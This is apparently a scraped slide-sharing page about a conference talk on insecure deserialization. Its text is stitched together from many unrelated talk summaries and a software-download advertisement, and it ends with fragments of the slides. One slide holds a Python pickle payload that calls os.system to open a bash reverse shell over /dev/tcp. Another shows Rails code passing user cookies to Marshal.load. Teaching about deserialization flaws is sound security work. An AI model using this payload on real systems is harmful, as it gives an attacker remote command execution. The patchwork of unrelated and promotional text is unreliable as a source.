Vlada Kulish shared us really technical topic about Deserialization or how one small object can break all your security.
OWASP Ukraine 2017 Security Conference
This is the short talk I delivered at the Ruby Underground Meetup in Tel Aviv for the local Ruby user group about some of the changes and new features in R
This document provides an overview of Mozilla Web Apps including:
- Web Apps can run on platforms like Windows, Mac, Android and more.
- They are built with open web technologies like HTML5, CSS, and JavaScript.
- A manifest file is needed to define the app and install it using the Mozilla Labs App Runtime extension.
- Web Apps can use features like offline storage, IndexedDB, and fullscreen mode.
The document discusses several techniques for optimizing web page performance including:
1. Using CSS shorthand properties to reduce code and specify font styles concisely.
2. Applying multiple classes to an element to combine styles from different classes.
3. Creating CSS sprites to reduce HTTP requests by combining images into a single file.
4. A few other techniques like cross-browser opacity, text wrapping, and Google web fonts.
1. The document discusses various SQL injection vulnerabilities and techniques for exploiting them, including on Metasploitable, DVWA, and Sqli-labs platforms.
2. It provides examples of payloads to extract database, table, and user information from Sqli-labs lessons 29, 32, 33, and 36.
3. The document also discusses challenges of SQL injection on MySQL databases using GBK encoding, and mitigations like addslashes(), preg_replace(), and mysql_real_escape_string().
This document discusses caching techniques in Rails, including page caching, action caching, and fragment caching. Page caching stores entire static HTML pages to serve cached content quickly without running Rails. Action caching runs controllers but caches output. Fragment caching caches portions of views. Caches can be expired based on model changes or timed expiration. Plugins like cache_fu and sweeper generators help manage caching.
This document discusses using the inherited_resources gem to simplify the implementation of RESTful controllers in Rails applications. It allows controllers to inherit common RESTful actions and configuration. Key features covered include defining resource and collection methods, customizing responses, configuring actions, overwriting actions, and integrating with other libraries like Decent Exposure and Responders.
Edge Side Include Injection: Abusing Caching Servers into SSRF and Transparen...Priyanka Aash
When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.
Application Diagnosis with Zend Server TracingZendCon
This document discusses Application Diagnosis with Zend Server Tracing. It provides an overview of debugging applications, introduces Zend Server Tracing as a better way to debug than var_dump, and covers how Zend Server Tracing works including code tracing, monitoring modes, and settings. It provides examples of using code tracing to diagnose uncaught exceptions, destructors, prepared statements, and memory usage. The document encourages using Zend Server Tracing in development, testing, staging, and production environments.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
This document discusses Clearance, an authentication gem for Ruby on Rails applications. It provides instructions for installing Clearance and includes code examples for integrating authentication functionality into a Rails model and controllers. It also outlines some future work items like refactoring, documentation, and additional authentication strategies.
This document discusses Magento, an open-source e-commerce platform built on the Zend Framework. It outlines how Magento utilizes around 15 Zend Framework components for functionality like controllers, views, caching, internationalization and databases. It also describes how additional Zend Framework components may be integrated in the future and how modules can extend and overwrite core Magento classes and functionality.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document contains notes from a meeting on web application security. It discusses several common vulnerabilities like SQL injection, cross-site scripting (XSS), and clickjacking. It provides examples of how these vulnerabilities can occur and ways to prevent them, such as sanitizing user input, enabling CSRF protection middleware, and using the X-Frame-Options header. Keywords discussed include MySQL, Docker, Kubernetes, Ansible, and various attack vectors like CSRF, XSS, SQL injection, and clickjacking. The document aims to educate on security best practices for Python and Django web applications.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document is a presentation about HTML5. It discusses what HTML5 is, some of the new elements it introduces like canvas, video, audio, and geolocation. It also covers new features like CSS3 media queries, web fonts using WOFF, and whether HTML5 is ready for use. The presentation encourages trying out HTML5 and provides some resources for learning more.
The document discusses Java servlets and Java Server Pages (JSP). It provides examples of HelloWorld servlets written in Java and JSP. It describes the basic lifecycle of servlets, how they interact with clients, and common tags used in JSP like comments, declarations, expressions and scriptlets. It also demonstrates using Java beans in JSP and an example to look up stock prices that retrieves data from a database using JDBC or alternatively by hardcoding logic based on the stock market source.
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
The document discusses the history and evolution of JavaScript packaging and module bundling from 2000 to the present. It covers early approaches using individual script tags to load JS files, the introduction of minification tools like JSMin in 2003, concatenating files together in the late 2000s, module loaders like RequireJS in 2009, the rise of Node.js and package managers in 2010, and the modern dominance of bundlers like Webpack since 2014 which use loaders to bundle dependencies and assets into single files or chunks.
Webpack is a module bundler that packs JavaScript files and their dependencies into small bundles for efficient loading on the browser. It builds a dependency graph by walking through imports and outputs bundles or individual files. Loaders allow transforming assets and piping them together, like using babel-loader to transpile JSX to ES5 and css-loader to bundle CSS. This summarizes the key points about Webpack's purpose, how it builds dependencies, and the role of loaders.
Webpack is just a module bundler, they said. What they didn't say is why we need it, and what was the motivation that made us achieve what Webpack have been doing for us. In this talk we will navigate through the years of front-end development, ranging from 2003 to nowadays to understand this, and in the end, we will walk thought a complete Webpack project to understand how it works.
Derek Willian Stavis (Pagar.me)
Todo mundo diz que Webpack ¨¦ s¨® um module bundler. Mas o que ¨¦ um m¨®dulo? O que ¨¦ um bundler? Porque precisamos disso? Vamos caminhar pela hist¨®ria do desenvolvimento web para entender estes conceitos, e no final vamos dissecar a configura??o e o output do Webpack para entendermos como ele funciona e como ele pode facilitar o seu processo de desenvolvimento.
Vale do Carbono Conference
XSS Defence with @manicode and @eoinkearyEoin Keary
The document discusses various techniques for preventing cross-site scripting (XSS) attacks, including encoding untrusted data for different contexts, using content security policy (CSP), and jQuery encoding plugins. It provides examples of using encoding libraries like OWASP Encoder to sanitize input for HTML, JavaScript, CSS, and more. It also describes DOM-based XSS defenses, avoiding dangerous jQuery methods, and the structure of CSP violation reports.
My popular talk on Debugging WordPress, presented at WordCamp London, WordCamp Norrkoping, Software University and WPBGUG
Video: http://wordpress.tv/2014/05/23/mario-peshev-debugging-wordpress/
Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra
The document discusses JavaServer Pages (JSP) and the Expression Language (EL) in JEE. It covers key JSP concepts like scripting elements, directive elements, standard action elements, and implicit objects. It also explains the translation of JSP files to servlets, and provides examples of using scripting elements, directives like <jsp:include>, and standard actions.
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer
Fr¨¹her war alles besser - sowieso! Konnte man vor 20 Jahren alleine mit HTML einen Webauftritt gestalten, hat sich die Anzahl der Technologien, die eine Webentwicklerin beherrschen muss, vervielfacht. Was ist wichtig, was unwichtig? In diesem Vortrag beleuchtet Jens-Christian den aktuellen Zoo von Technologien, und zeigt auf, wie sich diese Vielfalt sinnvoll b?ndigen l?sst.
HTML(5), CSS(3), JavaScript, CoffeeScript, JavaScript Frameworks (jQuery, Prototype, Moo, Dojo, Ext, ...), JavaScript Microframeworks (Backbone, Ember, Flatiron), Templatingsprachen, Hilfsmittel zur Gestaltung von CSS (SASS, SCSS), Responsive Design, Browsererkennung, Caching, Performancetweaks, Testing und vieles mehr wird thematisiert.
Clearance: Simple, complete Ruby web app authentication.Jason Morrison
This document discusses Clearance, an authentication gem for Ruby on Rails applications. It provides instructions for installing Clearance and includes code examples for integrating authentication functionality into a Rails model and controllers. It also outlines some future work items like refactoring, documentation, and additional authentication strategies.
This document discusses Magento, an open-source e-commerce platform built on the Zend Framework. It outlines how Magento utilizes around 15 Zend Framework components for functionality like controllers, views, caching, internationalization and databases. It also describes how additional Zend Framework components may be integrated in the future and how modules can extend and overwrite core Magento classes and functionality.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document contains notes from a meeting on web application security. It discusses several common vulnerabilities like SQL injection, cross-site scripting (XSS), and clickjacking. It provides examples of how these vulnerabilities can occur and ways to prevent them, such as sanitizing user input, enabling CSRF protection middleware, and using the X-Frame-Options header. Keywords discussed include MySQL, Docker, Kubernetes, Ansible, and various attack vectors like CSRF, XSS, SQL injection, and clickjacking. The document aims to educate on security best practices for Python and Django web applications.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and kinds of attacks it can be exposed to.
This document discusses serialization vulnerabilities and provides examples of how deserialization attacks work. It begins with an overview of serialization and why it is important. It then covers different serialization formats like binary, JSON, XML and examples of vulnerabilities in Java, Ruby, PHP, .NET and other languages. Useful links are also provided to learn more about detecting and exploiting serialization vulnerabilities.
Cross Site Scripting (XSS) Defense with JavaJim Manico
Cross Site Scripting Defense is difficult. The Java Programming language does not provide native key defenses necessary to throughly prevent XSS. As technologies such as Content Security Policy emerge, we still need pragmatic advice to stop XSS in legacy applications as well as new applications using traditional Java frameworks. First generation encoding libraries had both performance and completeness problems that prevent developers from through, production-safe XSS defense. This talk will deeply review the OWASP Java Encoder Project and the OWASP HTML Sanitizer Project and give detailed code samples highlighting their use. Additional advice on next-generation JavaScript and JSON workflows using the OWASP JSON Sanitizer will also be reviewed.
The document summarizes the OWASP Top 10 security risks and provides prevention techniques. It discusses injection, cross-site scripting (XSS), insecure deserialization, XML external entities (XXE), and other risks. For each risk, it recommends validating, sanitizing, and escaping user input, using prepared statements, and other best practices to prevent security vulnerabilities.
Vladimir Vorontsov - Splitting, smuggling and cache poisoning come backDefconRussia
This document discusses various techniques for HTTP response splitting and cache poisoning attacks. It provides examples of exploiting HTTP response splitting vulnerabilities to inject additional headers and responses. It also covers ways to poison caches by manipulating headers like Content-Length and Last-Modified to influence caching behavior. The document examines defenses implemented in modern browsers and web servers as well as mitigation techniques. It raises questions about the potential for these attacks to impact other protocols beyond HTTP.
The document is a presentation about HTML5. It discusses what HTML5 is, some of the new elements it introduces like canvas, video, audio, and geolocation. It also covers new features like CSS3 media queries, web fonts using WOFF, and whether HTML5 is ready for use. The presentation encourages trying out HTML5 and provides some resources for learning more.
The document discusses Java servlets and Java Server Pages (JSP). It provides examples of HelloWorld servlets written in Java and JSP. It describes the basic lifecycle of servlets, how they interact with clients, and common tags used in JSP like comments, declarations, expressions and scriptlets. It also demonstrates using Java beans in JSP and an example to look up stock prices that retrieves data from a database using JDBC or alternatively by hardcoding logic based on the stock market source.
TDC2017 | Florianopolis - Trilha DevOps How we figured out we had a SRE team ...tdc-globalcode
The document discusses the history and evolution of JavaScript packaging and module bundling from 2000 to the present. It covers early approaches using individual script tags to load JS files, the introduction of minification tools like JSMin in 2003, concatenating files together in the late 2000s, module loaders like RequireJS in 2009, the rise of Node.js and package managers in 2010, and the modern dominance of bundlers like Webpack since 2014 which use loaders to bundle dependencies and assets into single files or chunks.
Webpack is a module bundler that packs JavaScript files and their dependencies into small bundles for efficient loading on the browser. It builds a dependency graph by walking through imports and outputs bundles or individual files. Loaders allow transforming assets and piping them together, like using babel-loader to transpile JSX to ES5 and css-loader to bundle CSS. This summarizes the key points about Webpack's purpose, how it builds dependencies, and the role of loaders.
Webpack is just a module bundler, they said. What they didn't say is why we need it, and what was the motivation that made us achieve what Webpack have been doing for us. In this talk we will navigate through the years of front-end development, ranging from 2003 to nowadays to understand this, and in the end, we will walk thought a complete Webpack project to understand how it works.
Derek Willian Stavis (Pagar.me)
Todo mundo diz que Webpack ¨¦ s¨® um module bundler. Mas o que ¨¦ um m¨®dulo? O que ¨¦ um bundler? Porque precisamos disso? Vamos caminhar pela hist¨®ria do desenvolvimento web para entender estes conceitos, e no final vamos dissecar a configura??o e o output do Webpack para entendermos como ele funciona e como ele pode facilitar o seu processo de desenvolvimento.
Vale do Carbono Conference
XSS Defence with @manicode and @eoinkearyEoin Keary
The document discusses various techniques for preventing cross-site scripting (XSS) attacks, including encoding untrusted data for different contexts, using content security policy (CSP), and jQuery encoding plugins. It provides examples of using encoding libraries like OWASP Encoder to sanitize input for HTML, JavaScript, CSS, and more. It also describes DOM-based XSS defenses, avoiding dangerous jQuery methods, and the structure of CSP violation reports.
My popular talk on Debugging WordPress, presented at WordCamp London, WordCamp Norrkoping, Software University and WPBGUG
Video: http://wordpress.tv/2014/05/23/mario-peshev-debugging-wordpress/
Lecture 4: JavaServer Pages (JSP) & Expression Language (EL)Fahad Golra
The document discusses JavaServer Pages (JSP) and the Expression Language (EL) in JEE. It covers key JSP concepts like scripting elements, directive elements, standard action elements, and implicit objects. It also explains the translation of JSP files to servlets, and provides examples of using scripting elements, directives like <jsp:include>, and standard actions.
Whatever it takes - Fixing SQLIA and XSS in the processguest3379bd
This document discusses techniques for preventing SQL injection and cross-site scripting (XSS) vulnerabilities. It proposes using prepared statements with separate data and control planes as a "safe query object" approach. It also discusses policy-based sanitization of HTML and focusing code reviews on defect detection through annotating suspicious code regions. The overall goal is to help developers adopt architectures and techniques that thoroughly apply technical solutions to recognize and fix security weaknesses.
Beyond HTML - Scriptsprachen, Frameworks, Templatesprachen und vieles mehrJens-Christian Fischer
Fr¨¹her war alles besser - sowieso! Konnte man vor 20 Jahren alleine mit HTML einen Webauftritt gestalten, hat sich die Anzahl der Technologien, die eine Webentwicklerin beherrschen muss, vervielfacht. Was ist wichtig, was unwichtig? In diesem Vortrag beleuchtet Jens-Christian den aktuellen Zoo von Technologien, und zeigt auf, wie sich diese Vielfalt sinnvoll b?ndigen l?sst.
HTML(5), CSS(3), JavaScript, CoffeeScript, JavaScript Frameworks (jQuery, Prototype, Moo, Dojo, Ext, ...), JavaScript Microframeworks (Backbone, Ember, Flatiron), Templatingsprachen, Hilfsmittel zur Gestaltung von CSS (SASS, SCSS), Responsive Design, Browsererkennung, Caching, Performancetweaks, Testing und vieles mehr wird thematisiert.
This document summarizes Sandro "guly" Zaccarini's presentation on PHP web backdoor obfuscation techniques at EndSummerCamp 2k15. The presentation covers placing backdoors in PHP websites, different methods for executing code through PHP, real world examples of obfuscated backdoors found in the wild, and vulnerabilities that can enable backdoor execution. The goal is to demonstrate how PHP backdoors can be hidden through obfuscation and exploit vulnerabilities.
Brian hogg word camp preparing a plugin for translationwcto2017
You have a plugin, but you want users to be able to use it in their native language. Learn how to get it ready for translation, things to watch out for, and tips for maintaining it as you change the plugin over time.
This document discusses a code injection vulnerability in the internationalization (i18n) functionality of the CodeIgniter PHP web framework. Specifically, it shows how an attacker could exploit weaknesses in CodeIgniter's handling of localized language files to perform remote file inclusion (RFI) or local code inclusion attacks. The document provides examples of how an attacker could craft malicious input to include arbitrary files or code from remote or local systems. It also notes that over 240 existing CodeIgniter sites were found potentially vulnerable to this issue. In conclusion, the document invites questions and feedback on this CodeIgniter i18n code injection vulnerability.
The document discusses web applications built with JavaScript. It covers some key benefits of using JavaScript for web apps including speed, ability to use 2D/3D graphics, web audio, and file APIs. It also discusses common JavaScript frameworks and concepts like the DOM, events, asynchronous requests, and testing with Jasmine.
Igor Beliaiev "Incident Busters. Human Security Interaction"Igor Beliaiev
Igor was talking about latest biggest hacks and security threats, and about Human Security Interaction. Get ready to hear real-life stories about reasons why human factor is so important in security nowadays.
OWASP Ukraine 2017 Security Conference
Volodymyr Kimak "Security Tips for Android App"Igor Beliaiev
Are you interested how to make android app more secure against common threats? He is the one who might help ;) Check out Volodymyr Kimak speech "Security Tips for Android App"
OWASP Ukraine 2017 Security Conference
Presentation about the most dangerous attacks on Companies and People. The true power of physical security, Social engineering, tips and tricks about malware and hacking tools and devices
Presentation in SoftServe's Security Hole #18 about cryptolocker ransomware, how they work, distribution methods, possible remediation scenarios. Short story about one of our client, who got infected with cryptolocker on 1C database server, our incident forensics and recommendations hot to stay secure
This document discusses the risks small companies face from cyber attacks even though they think they are not important targets. It notes that while companies may think a hack will not happen, it is not a question of if but when. The consequences of a security failure include loss of trust, money, data, time to recover, and penalties. It then explores how non-critical applications and registration pages can still be vulnerable to hackers bypassing client-side restrictions and gaining database access, allowing them to change passwords or access sensitive information.
Presentation in SoftServe's Security Hole #11 about competitive intelligence for people and enterprise, risks and it's use in business. + Workshop for audience
What Makes "Deep Research"? A Dive into AI AgentsZilliz
About this webinar:
Unless you live under a rock, you will have heard about OpenAI¡¯s release of Deep Research on Feb 2, 2025. This new product promises to revolutionize how we answer questions requiring the synthesis of large amounts of diverse information. But how does this technology work, and why is Deep Research a noticeable improvement over previous attempts? In this webinar, we will examine the concepts underpinning modern agents using our basic clone, Deep Searcher, as an example.
Topics covered:
Tool use
Structured output
Reasoning models
Types of agentic memory
Computational Photography: How Technology is Changing Way We Capture the WorldHusseinMalikMammadli
? Computational Photography (Computer Vision/Image): How Technology is Changing the Way We Capture the World
He? d¨¹?¨¹nm¨¹s¨¹n¨¹zm¨¹, m¨¹asir smartfonlar v? kameralar nec? bu q?d?r g?z?l g?r¨¹nt¨¹l?r yarad?r? Bunun sirri Computational Fotoqrafiyas?nda(Computer Vision/Imaging) gizlidir¡ª??kill?ri ??km? v? emal etm? ¨¹sulumuzu t?kmill??dir?n, komp¨¹ter elmi il? fotoqrafiyan?n inqilabi birl??m?si.
How Discord Indexes Trillions of Messages: Scaling Search Infrastructure by V...ScyllaDB
This talk shares how Discord scaled their message search infrastructure using Rust, Kubernetes, and a multi-cluster Elasticsearch architecture to achieve better performance, operability, and reliability, while also enabling new search features for Discord users.
Gojek Clone is a versatile multi-service super app that offers ride-hailing, food delivery, payment services, and more, providing a seamless experience for users and businesses alike on a single platform.
World Information Architecture Day 2025 - UX at a CrossroadsJoshua Randall
User Experience stands at a crossroads: will we live up to our potential to design a better world? or will we be co-opted by ¡°product management¡± or another business buzzword?
Looking backwards, this talk will show how UX has repeatedly failed to create a better world, drawing on industry data from Nielsen Norman Group, Baymard, MeasuringU, WebAIM, and others.
Looking forwards, this talk will argue that UX must resist hype, say no more often and collaborate less often (you read that right), and become a true profession ¡ª in order to be able to design a better world.
Backstage Software Templates for Java DevelopersMarkus Eisele
As a Java developer you might have a hard time accepting the limitations that you feel being introduced into your development cycles. Let's look at the positives and learn everything important to know to turn Backstag's software templates into a helpful tool you can use to elevate the platform experience for all developers.
A Framework for Model-Driven Digital Twin EngineeringDaniel Lehner
ºÝºÝߣs from my PhD Defense at Johannes Kepler University, held on Janurary 10, 2025.
The full thesis is available here: https://epub.jku.at/urn/urn:nbn:at:at-ubl:1-83896
TrustArc Webinar - Building your DPIA/PIA Program: Best Practices & TipsTrustArc
Understanding DPIA/PIAs and how to implement them can be the key to embedding privacy in the heart of your organization as well as achieving compliance with multiple data protection / privacy laws, such as GDPR and CCPA. Indeed, the GDPR mandates Privacy by Design and requires documented Data Protection Impact Assessments (DPIAs) for high risk processing and the EU AI Act requires an assessment of fundamental rights.
How can you build this into a sustainable program across your business? What are the similarities and differences between PIAs and DPIAs? What are the best practices for integrating PIAs/DPIAs into your data privacy processes?
Whether you're refining your compliance framework or looking to enhance your PIA/DPIA execution, this session will provide actionable insights and strategies to ensure your organization meets the highest standards of data protection.
Join our panel of privacy experts as we explore:
- DPIA & PIA best practices
- Key regulatory requirements for conducting PIAs and DPIAs
- How to identify and mitigate data privacy risks through comprehensive assessments
- Strategies for ensuring documentation and compliance are robust and defensible
- Real-world case studies that highlight common pitfalls and practical solutions
Technology use over time and its impact on consumers and businesses.pptxkaylagaze
In this presentation, I explore how technology has changed consumer behaviour and its impact on consumers and businesses. I will focus on internet access, digital devices, how customers search for information and what they buy online, video consumption, and lastly consumer trends.
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Free Download Wondershare Filmora Full Version - All-in-one home video editor to make a great video.Free Download Wondershare Filmora for Windows PC is an all-in-one home video editor with powerful functionality and a fully stacked feature set. Filmora has a simple drag-and-drop top interface, allowing you to be artistic with the story you want to create.Video Editing Simplified - Ignite Your Story. A powerful and intuitive video editing experience. Filmora 10 hash two new ways to edit: Action Cam Tool (Correct lens distortion, Clean up your audio, New speed controls) and Instant Cutter (Trim or merge clips quickly, Instant export).Filmora allows you to create projects in 4:3 or 16:9, so you can crop the videos or resize them to fit the size you want. This way, quickly converting a widescreen material to SD format is possible.
UiPath Document Understanding - Generative AI and Active learning capabilitiesDianaGray10
This session focus on Generative AI features and Active learning modern experience with Document understanding.
Topics Covered:
Overview of Document Understanding
How Generative Annotation works?
What is Generative Classification?
How to use Generative Extraction activities?
What is Generative Validation?
How Active learning modern experience accelerate model training?
? If you have any questions or feedback, please refer to the "Women in Automation 2025" dedicated Forum thread. You can find there extra details and updates.
Inside Freshworks' Migration from Cassandra to ScyllaDB by Premkumar PatturajScyllaDB
Freshworks migrated from Cassandra to ScyllaDB to handle growing audit log data efficiently. Cassandra required frequent scaling, complex repairs, and had non-linear scaling. ScyllaDB reduced costs with fewer machines and improved operations. Using Zero Downtime Migration (ZDM), they bulk-migrated data, performed dual writes, and validated consistency.
Just like life, our code must evolve to meet the demands of an ever-changing world. Adaptability is key in developing for the web, tablets, APIs, or serverless applications. Multi-runtime development is the future, and that future is dynamic. Enter BoxLang: Dynamic. Modular. Productive. (www.boxlang.io)
BoxLang transforms development with its dynamic design, enabling developers to write expressive, functional code effortlessly. Its modular architecture ensures flexibility, allowing easy integration into your existing ecosystems.
Interoperability at Its Core
BoxLang boasts 100% interoperability with Java, seamlessly blending traditional and modern development practices. This opens up new possibilities for innovation and collaboration.
Multi-Runtime Versatility
From a compact 6MB OS binary to running on our pure Java web server, CommandBox, Jakarta EE, AWS Lambda, Microsoft Functions, WebAssembly, Android, and more, BoxLang is designed to adapt to any runtime environment. BoxLang combines modern features from CFML, Node, Ruby, Kotlin, Java, and Clojure with the familiarity of Java bytecode compilation. This makes it the go-to language for developers looking to the future while building a solid foundation.
Empowering Creativity with IDE Tools
Unlock your creative potential with powerful IDE tools designed for BoxLang, offering an intuitive development experience that streamlines your workflow. Join us as we redefine JVM development and step into the era of BoxLang. Welcome to the future.
FinTech - US Annual Funding Report - 2024.pptxTracxn
US FinTech 2024, offering a comprehensive analysis of key trends, funding activities, and top-performing sectors that shaped the FinTech ecosystem in the US 2024. The report delivers detailed data and insights into the region's funding landscape and other developments. We believe this report will provide you with valuable insights to understand the evolving market dynamics.
20. Old <Legitimate pickle>¡S¡¯<html><body>Foo¡¡¯n
<Legitimate pickle>
New <Legitimate pickle>¡S¡¯<html><body>
<Instruction returning string>¡¡¯n
<Legitimate pickle>
Result Identically-typed object to original with new attribute value
assigned by executed instructions
23. import pickle
import socket
import os
class payload(object):
def __reduce__(self):
comm = "bash -i >& /dev/tcp/ 0>&1"
return (os.system, (comm,))
payload = pickle.dumps( payload())
28. CVE-2013-0156 Ruby on Rails XML processor YAML deserialization
code execution
Unsafe Object Deserialization Vulnerability in
29. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies
<div class="content">
<%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %>